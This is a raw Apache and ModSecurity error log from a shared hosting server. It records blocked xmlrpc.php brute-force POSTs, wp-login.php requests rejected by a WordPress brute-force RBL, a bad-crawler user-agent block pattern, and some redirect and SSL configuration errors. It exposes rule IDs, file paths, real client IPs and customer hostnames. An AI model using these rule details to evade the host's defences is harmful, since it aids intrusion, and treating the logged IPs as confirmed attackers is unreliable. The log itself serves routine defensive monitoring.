[Tue May 26 19:29:54.683608 2026] [security2:error] [pid 49598:tid 49803] [client 161.97.118.197:50895] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 197.118.97.161.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWnWuzJzkdc0WtdrwtoXQAAANA"], referer: https://www.cagmedya.com/wp-login.php?action=register
[Tue May 26 19:29:54.704786 2026] [security2:error] [pid 49598:tid 49770] [client 91.245.236.124:53583] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnWuzJzkdc0WtdrwtoaQAAAK8"]
[Tue May 26 19:29:54.704879 2026] [security2:error] [pid 49598:tid 49770] [client 91.245.236.124:53583] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnWuzJzkdc0WtdrwtoaQAAAK8"]
[Tue May 26 19:29:55.478902 2026] [security2:error] [pid 49598:tid 49751] [client 91.245.236.124:13033] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnW-zJzkdc0WtdrwtoegAAAJw"]
[Tue May 26 19:29:55.479017 2026] [security2:error] [pid 49598:tid 49751] [client 91.245.236.124:13033] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnW-zJzkdc0WtdrwtoegAAAJw"]
[Tue May 26 19:29:56.082472 2026] [security2:error] [pid 49598:tid 49816] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnW-zJzkdc0WtdrwtogAAAAN0"]
[Tue May 26 19:29:56.240658 2026] [security2:error] [pid 49598:tid 49740] [client 91.245.236.124:33635] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnXOzJzkdc0WtdrwtokQAAAJE"]
[Tue May 26 19:29:56.240778 2026] [security2:error] [pid 49598:tid 49740] [client 91.245.236.124:33635] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnXOzJzkdc0WtdrwtokQAAAJE"]
[Tue May 26 19:29:56.743340 2026] [security2:error] [pid 49598:tid 49603] [remote 119.18.52.246:35368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWnXOzJzkdc0WtdrwtoogAA3gQ"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 19:29:57.019320 2026] [security2:error] [pid 49598:tid 49813] [client 91.245.236.124:17569] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnXezJzkdc0WtdrwtoqgAAANo"]
[Tue May 26 19:29:57.019436 2026] [security2:error] [pid 49598:tid 49813] [client 91.245.236.124:17569] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnXezJzkdc0WtdrwtoqgAAANo"]
[Tue May 26 19:29:57.784666 2026] [security2:error] [pid 49598:tid 49788] [client 91.245.236.124:64649] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnXezJzkdc0WtdrwtowQAAAME"]
[Tue May 26 19:29:57.784782 2026] [security2:error] [pid 49598:tid 49788] [client 91.245.236.124:64649] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnXezJzkdc0WtdrwtowQAAAME"]
[Tue May 26 19:29:58.485812 2026] [security2:error] [pid 49598:tid 49764] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnXuzJzkdc0WtdrwtoygAAAKk"]
[Tue May 26 19:29:58.561152 2026] [security2:error] [pid 49598:tid 49775] [client 91.245.236.124:17425] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnXuzJzkdc0Wtdrwto4QAAALQ"]
[Tue May 26 19:29:58.561269 2026] [security2:error] [pid 49598:tid 49775] [client 91.245.236.124:17425] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnXuzJzkdc0Wtdrwto4QAAALQ"]
[Tue May 26 19:29:58.739415 2026] [autoindex:error] [pid 49598:tid 49785] [client 159.223.28.233:0] AH01276: Cannot serve directory /home1/bloggkcf/public_html/subbroker.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:29:59.074144 2026] [core:error] [pid 49598:tid 49771] [client 159.223.28.233:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://www.subbroker.bloggertarget.com/
[Tue May 26 19:29:59.074170 2026] [core:error] [pid 49598:tid 49771] [client 159.223.28.233:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://www.subbroker.bloggertarget.com/
[Tue May 26 19:29:59.112804 2026] [security2:error] [pid 49598:tid 49755] [client 85.208.96.193:58128] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWnX-zJzkdc0Wtdrwto8gAAAKA"]
[Tue May 26 19:29:59.112952 2026] [security2:error] [pid 49598:tid 49755] [client 85.208.96.193:58128] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWnX-zJzkdc0Wtdrwto8gAAAKA"]
[Tue May 26 19:29:59.338729 2026] [security2:error] [pid 49598:tid 49797] [client 91.245.236.124:11569] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnX-zJzkdc0Wtdrwto-gAAAMo"]
[Tue May 26 19:29:59.338875 2026] [security2:error] [pid 49598:tid 49797] [client 91.245.236.124:11569] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnX-zJzkdc0Wtdrwto-gAAAMo"]
[Tue May 26 19:29:59.721045 2026] [autoindex:error] [pid 49598:tid 49773] [client 159.223.28.233:0] AH01276: Cannot serve directory /home1/bloggkcf/public_html/subbroker.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:29:59.794847 2026] [security2:error] [pid 49598:tid 49846] [client 98.158.233.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWnX-zJzkdc0WtdrwtpBgAAAPs"], referer: https://www.anujtradingco.com/
[Tue May 26 19:30:00.104236 2026] [security2:error] [pid 49598:tid 49789] [client 91.245.236.124:51401] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnYOzJzkdc0WtdrwtpEgAAAMI"]
[Tue May 26 19:30:00.104346 2026] [security2:error] [pid 49598:tid 49789] [client 91.245.236.124:51401] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnYOzJzkdc0WtdrwtpEgAAAMI"]
[Tue May 26 19:30:00.490052 2026] [security2:error] [pid 49598:tid 49614] [remote 209.42.20.53:34964] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahWnYOzJzkdc0WtdrwtpGgAA6A8"]
[Tue May 26 19:30:00.573110 2026] [security2:error] [pid 49598:tid 49748] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnYOzJzkdc0WtdrwtpFQAAAJk"]
[Tue May 26 19:30:00.879311 2026] [security2:error] [pid 49598:tid 49751] [client 91.245.236.124:32213] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnYOzJzkdc0WtdrwtpNAAAAJw"]
[Tue May 26 19:30:00.879408 2026] [security2:error] [pid 49598:tid 49751] [client 91.245.236.124:32213] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnYOzJzkdc0WtdrwtpNAAAAJw"]
[Tue May 26 19:30:01.184562 2026] [security2:error] [pid 49598:tid 49803] [client 98.158.233.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWnYezJzkdc0WtdrwtpSQAAANA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1229737&moderation-hash=c4c229f211cf29d37e945cb881081dd4
[Tue May 26 19:30:01.659544 2026] [security2:error] [pid 49598:tid 49805] [client 91.245.236.124:22789] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnYezJzkdc0WtdrwtpYQAAANI"]
[Tue May 26 19:30:01.659710 2026] [security2:error] [pid 49598:tid 49805] [client 91.245.236.124:22789] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnYezJzkdc0WtdrwtpYQAAANI"]
[Tue May 26 19:30:01.875698 2026] [ssl:error] [pid 49598:tid 49744] [client 66.132.195.91:9284] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname www.huronwoodphysio.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 19:30:02.238209 2026] [security2:error] [pid 49598:tid 49853] [client 62.60.130.233:50498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/wp-login.php"] [unique_id "ahWnYuzJzkdc0WtdrwtpegAAAQI"], referer: https://www.reddit.com/
[Tue May 26 19:30:02.428295 2026] [security2:error] [pid 49598:tid 49781] [client 91.245.236.124:54675] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnYuzJzkdc0WtdrwtpiwAAALo"]
[Tue May 26 19:30:02.428423 2026] [security2:error] [pid 49598:tid 49781] [client 91.245.236.124:54675] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnYuzJzkdc0WtdrwtpiwAAALo"]
[Tue May 26 19:30:02.578194 2026] [security2:error] [pid 49598:tid 49759] [client 62.60.130.233:51354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/wp-login.php"] [unique_id "ahWnYuzJzkdc0WtdrwtpmAAAAKQ"], referer: https://twitter.com/
[Tue May 26 19:30:03.001634 2026] [security2:error] [pid 49598:tid 49846] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnYuzJzkdc0WtdrwtplwAAAPs"]
[Tue May 26 19:30:03.072460 2026] [security2:error] [pid 49598:tid 49814] [client 185.143.228.155:62294] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahWnYezJzkdc0WtdrwtpQgAAANs"]
[Tue May 26 19:30:03.204494 2026] [security2:error] [pid 49598:tid 49832] [client 91.245.236.124:52421] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnY-zJzkdc0WtdrwtpvQAAAO0"]
[Tue May 26 19:30:03.204613 2026] [security2:error] [pid 49598:tid 49832] [client 91.245.236.124:52421] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnY-zJzkdc0WtdrwtpvQAAAO0"]
[Tue May 26 19:30:03.887752 2026] [core:error] [pid 49598:tid 49828] [client 159.223.28.233:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.subbroker.bloggertarget.com/
[Tue May 26 19:30:03.887777 2026] [core:error] [pid 49598:tid 49828] [client 159.223.28.233:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.subbroker.bloggertarget.com/
[Tue May 26 19:30:03.916970 2026] [security2:error] [pid 49598:tid 49782] [client 185.143.228.155:62440] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahWnY-zJzkdc0Wtdrwtp3QAAALs"]
[Tue May 26 19:30:03.979557 2026] [security2:error] [pid 49598:tid 49767] [client 91.245.236.124:49461] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnY-zJzkdc0Wtdrwtp6QAAAKw"]
[Tue May 26 19:30:03.979776 2026] [security2:error] [pid 49598:tid 49767] [client 91.245.236.124:49461] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnY-zJzkdc0Wtdrwtp6QAAAKw"]
[Tue May 26 19:30:04.380080 2026] [security2:error] [pid 49598:tid 49839] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnY-zJzkdc0Wtdrwtp6AAAAPQ"]
[Tue May 26 19:30:04.758289 2026] [security2:error] [pid 49598:tid 49751] [client 91.245.236.124:59243] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnZOzJzkdc0Wtdrwtp-AAAAJw"]
[Tue May 26 19:30:04.758417 2026] [security2:error] [pid 49598:tid 49751] [client 91.245.236.124:59243] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnZOzJzkdc0Wtdrwtp-AAAAJw"]
[Tue May 26 19:30:04.970483 2026] [security2:error] [pid 49598:tid 49627] [remote 49.12.3.147:38120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnZOzJzkdc0Wtdrwtp-wAAkRw"]
[Tue May 26 19:30:05.532838 2026] [security2:error] [pid 49598:tid 49752] [client 91.245.236.124:41279] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnZezJzkdc0WtdrwtqFQAAAJ0"]
[Tue May 26 19:30:05.532976 2026] [security2:error] [pid 49598:tid 49752] [client 91.245.236.124:41279] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnZezJzkdc0WtdrwtqFQAAAJ0"]
[Tue May 26 19:30:06.297586 2026] [security2:error] [pid 49598:tid 49850] [client 91.245.236.124:42487] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnZuzJzkdc0WtdrwtqJAAAAP8"]
[Tue May 26 19:30:06.297748 2026] [security2:error] [pid 49598:tid 49850] [client 91.245.236.124:42487] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnZuzJzkdc0WtdrwtqJAAAAP8"]
[Tue May 26 19:30:07.078958 2026] [security2:error] [pid 49598:tid 49829] [client 91.245.236.124:51209] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnZ-zJzkdc0WtdrwtqRgAAAOo"]
[Tue May 26 19:30:07.079103 2026] [security2:error] [pid 49598:tid 49829] [client 91.245.236.124:51209] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnZ-zJzkdc0WtdrwtqRgAAAOo"]
[Tue May 26 19:30:07.847967 2026] [security2:error] [pid 49598:tid 49801] [client 91.245.236.124:64055] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnZ-zJzkdc0WtdrwtqWAAAAM4"]
[Tue May 26 19:30:07.848085 2026] [security2:error] [pid 49598:tid 49801] [client 91.245.236.124:64055] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnZ-zJzkdc0WtdrwtqWAAAAM4"]
[Tue May 26 19:30:08.622759 2026] [security2:error] [pid 49598:tid 49847] [client 91.245.236.124:9031] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnaOzJzkdc0WtdrwtqcAAAAPw"]
[Tue May 26 19:30:08.622888 2026] [security2:error] [pid 49598:tid 49847] [client 91.245.236.124:9031] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnaOzJzkdc0WtdrwtqcAAAAPw"]
[Tue May 26 19:30:08.915596 2026] [security2:error] [pid 49598:tid 49832] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnaOzJzkdc0WtdrwtqawAAAO0"]
[Tue May 26 19:30:09.388431 2026] [security2:error] [pid 49598:tid 49852] [client 91.245.236.124:59893] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnaezJzkdc0WtdrwtqiAAAAQE"]
[Tue May 26 19:30:09.388531 2026] [security2:error] [pid 49598:tid 49852] [client 91.245.236.124:59893] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnaezJzkdc0WtdrwtqiAAAAQE"]
[Tue May 26 19:30:10.036463 2026] [security2:error] [pid 49598:tid 49833] [client 114.119.154.161:34875] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.aastha-enterprises.com"] [uri "/serviceguide.html"] [unique_id "ahWnauzJzkdc0WtdrwtqngAAAO4"], referer: http://www.aastha-enterprises.com/
[Tue May 26 19:30:10.167052 2026] [security2:error] [pid 49598:tid 49840] [client 91.245.236.124:36183] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnauzJzkdc0WtdrwtqqAAAAPU"]
[Tue May 26 19:30:10.167177 2026] [security2:error] [pid 49598:tid 49840] [client 91.245.236.124:36183] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnauzJzkdc0WtdrwtqqAAAAPU"]
